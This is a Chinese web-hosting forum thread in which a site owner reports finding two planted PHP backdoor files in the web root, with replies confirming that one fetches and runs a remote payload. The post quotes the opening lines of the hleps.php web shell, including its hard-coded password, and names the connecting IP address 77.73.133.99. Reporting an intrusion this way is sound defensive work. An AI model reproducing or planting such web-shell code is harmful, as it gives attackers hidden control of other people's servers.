共计 931 个字符,预计需要花费 3 分钟才能阅读完成。
内容最后由 iloveloc 于 2022-11-16 22:29 编辑 网站根目录莫名下面多了一个文件。vwQFV.php 内容我看不太懂,只能看到起始位置有一个连接俄罗斯 IP【77.73.133.99】的操作。里面有恶意代码,传不上来,下面有图。后来又仔细检查,发现另一个木马文件:hleps.php<?php$ppp="zhululu666";$sname="sangni";$myurl="";error_reporting(E_ERROR | E_PARSE);@set_time_limit(0);header("content-Type: text/html; charset=gb2312");$filename=\’$ppp=\\\’\’.$ppp.\’\\\’;$sname=\\\’\’.$sname.\’\\\’;$myurl=\\\’\’.$myurl.\’\\\’; 复制代码手动访问这个文件,还有他么密码,盲猜开头的 $ppp 可能是密码,然后猜对了。好家伙,真是木马:Eric.c 2022-11-16 21:17 2 是,远程下载一个文件,执行 aru 2022-11-16 21:18 3 当然是木马了 所長 2022-11-16 21:18 4? 是木马 烟花三月 2022-11-16 21:22 5 是 antbt 2022-11-16 21:23 6 下载 trester 并执行 虎谷 2022-11-16 21:24 7 是木马,后门木马 叼爆小朋友 2022-11-16 21:26 8 后门木马,IP 地址暴露了,看坛友 DD CC 刷流量的表演? 御坂 2022-11-16 22:31 9 之前我的站点被人植入恶意文件,相当于用我的做了个跳转,刷 SEO,恶意关键词 Google 那边一看收录了我大几万条记录,判断是只有 Google BOT 的 UA 才允许访问,跳转到仿冒站点。Google 就会把获取到的内容、标题记录下来。但是真人访问,就是 404. 我站点一直被微软 smartscreen 报毒,后来才发现这回事。后来排查了一下老旧的缓存插件和破解版主题。问题消除 920 2022-11-17 00:19 10 研究一下是怎么入侵的。毕竟有一次后,那这个程序就说明有问题了,删了也没用 pjk 2022-11-17 00:27 11root 估计被拿下了
